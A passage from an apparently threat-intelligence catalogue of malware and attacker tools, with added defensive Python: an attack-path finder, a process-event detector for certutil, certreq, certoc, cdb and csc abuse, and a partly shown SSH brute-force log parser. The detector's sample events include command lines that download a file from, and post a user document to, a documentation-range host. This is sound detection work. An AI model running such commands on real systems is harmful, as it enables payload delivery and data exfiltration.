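    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            hops = []
            while parent[node] is not None:
                prev, rel = parent[node]
                hops.append((prev, rel, node))
                node = prev
            return hops[::-1]
        for rel, nxt in graph[node]:
            if nxt not in parent:
                parent[nxt] = (node, rel)
                queue.append(nxt)
    return None


def principals_reaching(graph, goal):
    """Every node with some path to goal: BFS over the reversed graph."""
    reverse = {}
    for src, outs in graph.items():
        for _rel, dst in outs:
            reverse.setdefault(dst, []).append(src)
    seen, queue = {goal}, deque([goal])
    while queue:
        for prev in reverse.get(queue.popleft(), []):
            if prev not in seen:
                seen.add(prev)
                queue.append(prev)
    seen.discard(goal)
    return seen


def format_path(path):
    """Render a hop list as 'a -[rel]-> b -[rel]-> c'."""
    out = path[0][0]
    for _src, rel, dst in path:
        out += f" -[{rel}]-> {dst}"
    return out


if __name__ == "__main__":
    g = build_graph(EDGES)
    for node in sorted(principals_reaching(g, TARGET)):
        print(format_path(shortest_path(g, node, TARGET)))
```

Run as a script it lists, for each principal that can reach the target group, the shortest chain it would take; the defensive reading of the same output is the edge to remove (here the helpdesk group's local admin rights on a workstation where a privileged user has a session).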

Internal MISP references

UUID 72658763-8077-451e-8572-38858f8cacf3 which can be used as unique global reference for BloodHound in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0521
source MITRE
tags ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865']
type ['tool']
Related clusters

To see the related clusters, click here.

BLUELIGHT

BLUELIGHT is a remote access Trojan used by APT37 that was first observed in early 2021.[Volexity InkySquid BLUELIGHT August 2021]

Internal MISP references

UUID 3aaaaf86-638b-4a65-be18-c6e6dcdcdb97 which can be used as unique global reference for BLUELIGHT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0657
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Bonadan

Bonadan is a malicious version of OpenSSH which acts as a custom backdoor. Bonadan has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.[ESET ForSSHe December 2018]

Internal MISP references

UUID 3793db4b-f843-4cfd-89d2-ec28b62feda5 which can be used as unique global reference for Bonadan in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux']
software_attack_id S0486
source MITRE
type ['malware']

BONDUPDATER

BONDUPDATER is a PowerShell backdoor used by OilRig. It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.[FireEye APT34 Dec 2017][Palo Alto OilRig Sep 2018]

Internal MISP references

UUID d8690218-5272-47d8-8189-35d3b518e66f which can be used as unique global reference for BONDUPDATER in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0360
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

BoomBox

BoomBox is a downloader responsible for executing next stage components that has been used by APT29 since at least 2021.[MSTIC Nobelium Toolset May 2021]

Internal MISP references

UUID 9d393f6f-855e-4348-8a26-008174e3605a which can be used as unique global reference for BoomBox in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0635
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

BOOSTWRITE

BOOSTWRITE is a loader crafted to be launched via abuse of the DLL search order of applications used by FIN7.[FireEye FIN7 Oct 2019]

Internal MISP references

UUID 74a73624-d53b-4c84-a14b-8ae964fd577c which can be used as unique global reference for BOOSTWRITE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0415
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

BOOTRASH

BOOTRASH is a Bootkit that targets Windows operating systems. It has been used by threat actors that target the financial sector.[Mandiant M Trends 2016][FireEye Bootkits][FireEye BOOTRASH SANS]

Internal MISP references

UUID d47a4753-80f5-494e-aad7-d033aaff0d6d which can be used as unique global reference for BOOTRASH in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0114
source MITRE
type ['malware']

BoxCaon

BoxCaon is a Windows backdoor that was used by IndigoZebra in a 2021 spearphishing campaign against Afghan government officials. BoxCaon's name stems from similarities shared with the malware family xCaon.[Checkpoint IndigoZebra July 2021]

Internal MISP references

UUID d3e46011-3433-426c-83b3-61c2576d5f71 which can be used as unique global reference for BoxCaon in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0651
source MITRE
tags ['4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['malware']
Related clusters

To see the related clusters, click here.

Brave Prince

Brave Prince is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to Gold Dragon, and was seen along with Gold Dragon and RunningRAT in operations surrounding the 2018 Pyeongchang Winter Olympics. [McAfee Gold Dragon]

Internal MISP references

UUID 51b27e2c-c737-4006-a657-195ea1a1f4f0 which can be used as unique global reference for Brave Prince in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0252
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Briba

Briba is a trojan used by Elderwood to open a backdoor and download files on to compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Briba May 2012]

Internal MISP references

UUID 7942783c-73a7-413c-94d1-8981029a1c51 which can be used as unique global reference for Briba in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0204
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Brute Ratel C4

Brute Ratel C4 is a commercial red-teaming and adversarial attack simulation tool that first appeared in December 2020. Brute Ratel C4 was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities, and deploys agents called badgers to enable arbitrary command execution for lateral movement, privilege escalation, and persistence. In September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.[Dark Vortex Brute Ratel C4][Palo Alto Brute Ratel July 2022][MDSec Brute Ratel August 2022][SANS Brute Ratel October 2022][Trend Micro Black Basta October 2022]

Internal MISP references

UUID 23043b44-69a6-5cdf-8f60-5a68068680c7 which can be used as unique global reference for Brute Ratel C4 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1063
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'e81ba503-60b0-4b64-8f20-ef93e7783796']
type ['tool']
Related clusters

To see the related clusters, click here.

BS2005

BS2005 is malware that was used by Ke3chang in spearphishing campaigns since at least 2011. [Mandiant Operation Ke3chang November 2014]

Internal MISP references

UUID c9e773de-0213-4b64-83fb-637060c8b5ed which can be used as unique global reference for BS2005 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0014
source MITRE
type ['malware']

BUBBLEWRAP

BUBBLEWRAP is a full-featured, second-stage backdoor used by the admin@338 group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. [FireEye admin@338]

Internal MISP references

UUID 2be4e3d2-e8c5-4406-8041-2c17bdb3a547 which can be used as unique global reference for BUBBLEWRAP in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0043
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

build_downer

build_downer is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]

Internal MISP references

UUID c21d3e6c-0f6d-44a8-bdd5-5b3180a641c9 which can be used as unique global reference for build_downer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0471
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

Bumblebee

Bumblebee is a custom loader written in C++ that has been used by multiple threat actors, including possible initial access brokers, to download and execute additional payloads since at least March 2022. Bumblebee has been linked to ransomware operations including Conti, Quantum, and Mountlocker and derived its name from the appearance of "bumblebee" in the user-agent.[Google EXOTIC LILY March 2022][Proofpoint Bumblebee April 2022][Symantec Bumblebee June 2022]

Internal MISP references

UUID cc155181-fb34-4aaf-b083-b7b57b140b7a which can be used as unique global reference for Bumblebee in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1039
source MITRE
tags ['aa983c81-e54b-49b3-b0dd-53cf950825b8', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

Bundlore

Bundlore is adware written for macOS that has been in use since at least 2015. Though categorized as adware, Bundlore has many features associated with more traditional backdoors.[MacKeeper Bundlore Apr 2019]

Internal MISP references

UUID e9873bf1-9619-4c62-b4cf-1009e83de186 which can be used as unique global reference for Bundlore in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0482
source MITRE
tags ['4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['malware']

Cachedump

Cachedump is a publicly available tool that extracts cached domain logon password hashes from a system's registry. [Mandiant APT1]

Internal MISP references

UUID 7c03fb92-3cd8-4ce4-a1e0-75e47465e4bc which can be used as unique global reference for Cachedump in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0119
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

CaddyWiper

CaddyWiper is a destructive data wiper that has been used in attacks against organizations in Ukraine since at least March 2022.[ESET CaddyWiper March 2022][Cisco CaddyWiper March 2022]

Internal MISP references

UUID 62d0ddcd-790d-4d2d-9d94-276f54b40cf0 which can be used as unique global reference for CaddyWiper in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0693
source MITRE
tags ['2e621fc5-dea4-4cb9-987e-305845986cd3']
type ['malware']

Cadelspy

Cadelspy is a backdoor that has been used by APT39.[Symantec Chafer Dec 2015]

Internal MISP references

UUID c8a51b39-6906-4381-9bb4-4e9e612aa085 which can be used as unique global reference for Cadelspy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0454
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

CALENDAR

CALENDAR is malware used by APT1 that mimics legitimate Gmail Calendar traffic. [Mandiant APT1]

Internal MISP references

UUID ad859a79-c183-44f6-a89a-f734710672a9 which can be used as unique global reference for CALENDAR in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0025
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Calisto

Calisto is a macOS Trojan that opens a backdoor on the compromised machine. Calisto is believed to have first been developed in 2016. [Securelist Calisto July 2018] [Symantec Calisto July 2018]

Internal MISP references

UUID 6b5b408c-4f9d-4137-bfb1-830d12e9736c which can be used as unique global reference for Calisto in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0274
source MITRE
type ['malware']

CallMe

CallMe is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. [Scarlet Mimic Jan 2016]

Internal MISP references

UUID 352ee271-89e6-4d3f-9c26-98dbab0e2986 which can be used as unique global reference for CallMe in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0077
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Cannon

Cannon is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. [Unit42 Cannon Nov 2018][Unit42 Sofacy Dec 2018]

Internal MISP references

UUID 790e931d-2571-496d-9f48-322774a7d482 which can be used as unique global reference for Cannon in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0351
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Carbanak

Carbanak is a full-featured, remote backdoor used by a group of the same name (Carbanak). It is intended for espionage, data exfiltration, and providing remote access to infected machines. [Kaspersky Carbanak] [FireEye CARBANAK June 2017]

Internal MISP references

UUID 4cb9294b-9e4c-41b9-b640-46213a01952d which can be used as unique global reference for Carbanak in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0030
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Carberp

Carberp is a credential and information stealing malware that has been active since at least 2009. Carberp's source code was leaked online in 2013, and subsequently used as the foundation for the Carbanak backdoor.[Trend Micro Carberp February 2014][Kaspersky Carbanak][RSA Carbanak November 2017]

Internal MISP references

UUID df9491fd-5e24-4548-8e21-1268dce59d1f which can be used as unique global reference for Carberp in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0484
source MITRE
type ['malware']

Carbon

Carbon is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. Carbon has been selectively used by Turla to target government and foreign affairs-related organizations in Central Asia.[ESET Carbon Mar 2017][Securelist Turla Oct 2018]

Internal MISP references

UUID 61f5d19c-1da2-43d1-ab20-51eacbca71f2 which can be used as unique global reference for Carbon in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0335
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Cardinal RAT

Cardinal RAT is a potentially low volume remote access trojan (RAT) observed since December 2015. Cardinal RAT is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler.[PaloAlto CardinalRat Apr 2017]

Internal MISP references

UUID fa23acef-3034-43ee-9610-4fc322f0d80b which can be used as unique global reference for Cardinal RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0348
source MITRE
tags ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59']
type ['malware']

CARROTBALL

CARROTBALL is an FTP downloader utility that has been in use since at least 2019. CARROTBALL has been used as a downloader to install SYSCON.[Unit 42 CARROTBAT January 2020]

Internal MISP references

UUID 84bb4068-b441-435e-8535-02a458ffd50b which can be used as unique global reference for CARROTBALL in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0465
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['tool']

CARROTBAT

CARROTBAT is a customized dropper that has been in use since at least 2017. CARROTBAT has been used to install SYSCON and has infrastructure overlap with KONNI.[Unit 42 CARROTBAT November 2018][Unit 42 CARROTBAT January 2020]

Internal MISP references

UUID aefa893d-fc6e-41a9-8794-2700049db9e5 which can be used as unique global reference for CARROTBAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0462
source MITRE
type ['malware']

Catchamas

Catchamas is a Windows Trojan that steals information from compromised systems. [Symantec Catchamas April 2018]

Internal MISP references

UUID 04deccb5-9850-45c3-a900-5d7039a94190 which can be used as unique global reference for Catchamas in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0261
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Caterpillar WebShell

Caterpillar WebShell is a self-developed Web Shell tool created by the group Volatile Cedar.[ClearSky Lebanese Cedar Jan 2021]

Internal MISP references

UUID ee88afaa-88bc-4c20-906f-332866388549 which can be used as unique global reference for Caterpillar WebShell in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0572
source MITRE
tags ['311abf64-a9cc-4c6a-b778-32c5df5658be']
type ['malware']
Related clusters

To see the related clusters, click here.

CC-Attack

CC-Attack is a publicly available script that automates the use of open, external proxy servers as part of denial of service flood attacks. Its use has been promoted among the members of the Killnet hacktivist collective.[Flashpoint Glossary Killnet]

Internal MISP references

UUID 7664bfa5-8477-4903-9103-1144113fca36 which can be used as unique global reference for CC-Attack in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Linux', 'Windows']
software_attack_id S5062
source Tidal Cyber
tags ['62bde669-3020-4682-be68-36c83b2588a4']
type ['malware']
Related clusters

To see the related clusters, click here.

CCBkdr

CCBkdr is malware that was injected into a signed version of CCleaner and distributed from CCleaner's distribution website. [Talos CCleanup 2017] [Intezer Aurora Sept 2017]

Internal MISP references

UUID 4eb0720c-7046-4ff1-adfd-ae603506e499 which can be used as unique global reference for CCBkdr in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0222
source MITRE
tags ['f2ae2283-f94d-4f8f-bbde-43f2bed66c55']
type ['malware']

ccf32

ccf32 is data collection malware that has been used since at least February 2019, most notably during the FunnyDream campaign; there is also a similar x64 version.[Bitdefender FunnyDream Campaign November 2020]

Internal MISP references

UUID e00c2a0c-bbe5-4eff-b0ad-b2543456a317 which can be used as unique global reference for ccf32 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1043
source MITRE
type ['malware']

Cdb

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Debugging tool included with Windows Debugging Tools.

Author: Oddvar Moe

Paths:
* C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
* C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe

Resources:
* http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
* https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
* https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
* https://mrd0x.com/the-power-of-cdb-debugging-tool/
* https://twitter.com/nas_bench/status/1534957360032120833

Detection:
* Sigma: proc_creation_win_lolbin_cdb.yml
* Elastic: defense_evasion_unusual_process_network_connection.toml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules [Cdb.exe - LOLBAS Project]

Internal MISP references

UUID d9ea2696-7c47-44cd-8784-9aeef5e149ea which can be used as unique global reference for Cdb in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5208
source Tidal Cyber
tags ['4479b9e9-d912-451a-9ad5-08b3d922422d', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

CertOC

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used for installing certificates

Author: Ensar Samil

Paths:
* c:\windows\system32\certoc.exe
* c:\windows\syswow64\certoc.exe

Resources:
* https://twitter.com/sblmsrsn/status/1445758411803480072?s=20
* https://twitter.com/sblmsrsn/status/1452941226198671363?s=20

Detection:
* Sigma: proc_creation_win_certoc_load_dll.yml
* IOC: Process creation with given parameter
* IOC: Unsigned DLL load via certoc.exe
* IOC: Network connection via certoc.exe [CertOC.exe - LOLBAS Project]

Internal MISP references

UUID 34e1c197-ac43-4634-9a0d-9148c748f774 which can be used as unique global reference for CertOC in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5087
source Tidal Cyber
tags ['fb909648-ee44-4871-abe6-82c909c4d677', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

CertReq

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used for requesting and managing certificates

Author: David Middlehurst

Paths:
* C:\Windows\System32\certreq.exe
* C:\Windows\SysWOW64\certreq.exe

Resources:
* https://dtm.uk/certreq

Detection:
* Sigma: proc_creation_win_lolbin_susp_certreq_download.yml
* IOC: certreq creates new files
* IOC: certreq makes POST requests [CertReq.exe - LOLBAS Project]

Internal MISP references

UUID 43050f80-ce28-49e3-aac6-cb3f4a07f4b4 which can be used as unique global reference for CertReq in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5088
source Tidal Cyber
tags ['35a798a2-eaab-48a3-9ee7-5538f36a4172', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

certutil

certutil is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. [TechNet Certutil]
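The Cdb, CertOC, CertReq and certutil entries above each point at detection rules without showing the logic, and the Cardinal RAT entry describes a related living-off-the-land pattern (compiling C# at runtime with csc.exe). The added example below is one rule set over process-creation events covering all five; it is not the LOLBAS project's code nor the Sigma or Elastic rules those entries name. The events are constructed dicts shaped like Sysmon Event ID 1 fields, and the command-line heuristics are deliberately simple and will need tuning against a real environment.

```python
"""Triage Windows process-creation events for the LOLBAS binaries in this cluster
(cdb.exe, certoc.exe, certreq.exe, certutil.exe) and for runtime csc.exe
compilation from a user-writable path, the technique noted for Cardinal RAT.

Added example, not from LOLBAS or the Sigma/Elastic rules it names. Events are
constructed in the shape of Sysmon Event ID 1 (Image, ParentImage, CommandLine).
"""
import re
from pathlib import PureWindowsPath

USER_WRITABLE = re.compile(
    r"\\(?:Users\\[^\\]+\\AppData|Users\\Public|Windows\\Temp|ProgramData)\\", re.I)
BUILD_PARENTS = {"msbuild.exe", "devenv.exe", "dotnet.exe", "vbcscompiler.exe"}

# (rule name, image basename, predicate(command line, parent basename))
RULES = [
    ("certutil_download", "certutil.exe",
     lambda cl, p: re.search(r"-urlcache\b", cl, re.I) is not None),
    ("certutil_decode", "certutil.exe",
     lambda cl, p: re.search(r"-(?:decode|decodehex|encode)\b", cl, re.I) is not None),
    ("certreq_post_upload", "certreq.exe",            # -Post -config <url> <file>
     lambda cl, p: re.search(r"-post\b.*-config\b", cl, re.I) is not None),
    ("certoc_loaddll", "certoc.exe",                  # -LoadDLL <path>
     lambda cl, p: re.search(r"-loaddll\b", cl, re.I) is not None),
    ("cdb_script_execution", "cdb.exe",               # -cf <script> / -c <cmd>
     lambda cl, p: re.search(r"\s-cf?\s", cl, re.I) is not None),
    ("csc_compile_from_user_path", "csc.exe",         # not launched by a build tool
     lambda cl, p: USER_WRITABLE.search(cl) is not None and p not in BUILD_PARENTS),
]


def basename(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def evaluate(event):
    """Rule names that fire for one event."""
    img, parent = basename(event["Image"]), basename(event.get("ParentImage", ""))
    cl = event.get("CommandLine", "")
    return [name for name, target, pred in RULES if img == target and pred(cl, parent)]


def triage(events):
    """Index -> fired rules, for events that fired at least one."""
    return {i: hits for i, ev in enumerate(events) if (hits := evaluate(ev))}


SAMPLE_EVENTS = [  # constructed; 203.0.113.5 is a documentation address
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.5/a.txt C:\Users\Public\a.txt"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -decode C:\Users\Public\a.txt C:\Users\Public\a.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -dump"},
    {"Image": r"C:\Windows\System32\certreq.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certreq.exe -Post -config https://203.0.113.5/ C:\Users\bob\Documents\q3.docx out.txt"},
    {"Image": r"C:\Windows\System32\certoc.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"certoc.exe -LoadDLL C:\Users\Public\x.dll"},
    {"Image": r"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"cdb.exe -cf C:\Users\Public\run.wds -o notepad.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"csc.exe /noconfig /out:C:\Users\bob\AppData\Local\Temp\a.exe C:\Users\bob\AppData\Local\Temp\a.cs"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Program Files\dotnet\dotnet.exe",
     "CommandLine": r"csc.exe /noconfig @C:\src\proj\obj\Debug\proj.rsp"},
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(idx, hits, SAMPLE_EVENTS[idx]["CommandLine"])
```

The benign events (certutil -dump, csc.exe under a build tool) are there to show the false-positive boundary: these binaries are legitimate, so the rule has to key on the argument pattern or the parent, never on the image alone. The Sigma rules named in the entries above encode the same idea with more exceptions.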

Internal MISP references

UUID 2fe21578-ee31-4ee8-b6ab-b5f76f97d043 which can be used as unique global reference for certutil in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0160
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '412da5b4-fb41-40fc-a29a-78dc9119aa75', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Chaes

Chaes is a multistage information stealer written in several programming languages that collects login credentials, credit card numbers, and other financial information. Chaes was first observed in 2020, and appears to primarily target victims in Brazil as well as other e-commerce customers in Latin America.[Cybereason Chaes Nov 2020]

Internal MISP references

UUID 0c8efcd0-bfdf-4771-8754-18aac836c359 which can be used as unique global reference for Chaes in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0631
source MITRE
tags ['4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['malware']

Chaos

Chaos is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets. [Chaos Stolen Backdoor]
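Because Chaos gains its foothold by guessing SSH passwords, the earliest signal is in the sshd authentication log. The added example below (not from the cited Chaos analysis) scores sources by failed-login bursts and separately reports accounts that a bursting source later logged into with a password, which is the case that matters for this malware. The log lines are constructed in the syslog format sshd uses on common Linux distributions; they carry no year, so one is assumed when parsing.

```python
"""Flag SSH password-guessing sources, and guesses that eventually succeeded,
from sshd authentication log lines.

Added example, not from the Chaos analysis. SAMPLE_LOG is constructed; the
addresses are documentation ranges. Syslog timestamps have no year, so
ASSUMED_YEAR is used when parsing.
"""
import re
from collections import defaultdict
from datetime import datetime

SAMPLE_LOG = """\
Mar  3 09:12:01 web1 sshd[2211]: Failed password for root from 203.0.113.7 port 51822 ssh2
Mar  3 09:12:03 web1 sshd[2213]: Failed password for invalid user admin from 203.0.113.7 port 51830 ssh2
Mar  3 09:12:06 web1 sshd[2215]: Failed password for invalid user test from 203.0.113.7 port 51841 ssh2
Mar  3 09:12:09 web1 sshd[2217]: Failed password for root from 203.0.113.7 port 51850 ssh2
Mar  3 09:12:11 web1 sshd[2219]: Failed password for invalid user oracle from 203.0.113.7 port 51862 ssh2
Mar  3 09:12:14 web1 sshd[2221]: Failed password for root from 203.0.113.7 port 51870 ssh2
Mar  3 09:12:17 web1 sshd[2223]: Accepted password for root from 203.0.113.7 port 51878 ssh2
Mar  3 09:13:40 web1 sshd[2240]: Failed password for alice from 198.51.100.20 port 40122 ssh2
Mar  3 09:13:48 web1 sshd[2240]: Accepted password for alice from 198.51.100.20 port 40122 ssh2
Mar  3 09:15:02 web1 sshd[2260]: Accepted publickey for deploy from 192.0.2.9 port 38800 ssh2: ED25519 SHA256:abc
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
ASSUMED_YEAR = 2024


def parse(log_text):
    """Yield (timestamp, result, method, user, ip) for each sshd auth line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        stamp = " ".join(m["ts"].split())           # collapse the day-padding space
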